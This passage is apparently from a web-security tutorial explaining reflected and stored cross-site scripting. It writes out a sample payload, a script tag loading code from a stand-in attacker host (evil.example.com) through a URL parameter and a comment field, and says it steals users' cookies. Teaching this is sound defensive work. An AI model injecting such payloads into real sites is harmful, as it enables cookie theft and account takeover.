Now that you know what is a XSS attack, lets read some Cross-Site scripting examples.
Reflected XSS
Let’s say an attacker encounter a URL with a parameter containing a message like this:
http://example.com/?message=You+are+now+logged-in
And the page contains this exact message.
This means that anything passed in this parameter named message will be printed in the page.
To exploit it, the attacker will just have to replace the message by an evil script:
http://example.com/?message=<script src="http://evil.example.com/malicious-script.js"></script>
Now, he will send the page to the administrator, the script can now steal some user’s data like the cookies and send it on the attacker’s email.
Stored XSS
Like the first one, but this time, the content will be stored in the database of the targeted and vulnerable website.
Let’s say an attacker just posted a comment using HTML tags, and the tags are evaluated. This could lead to the XSS.
To exploit, the attacker will just add the malicious script link in his message:
<script src="http://evil.example.com/malicious-script.js"></script>
If the website is vulnerable, it means there is a lack of sanitization.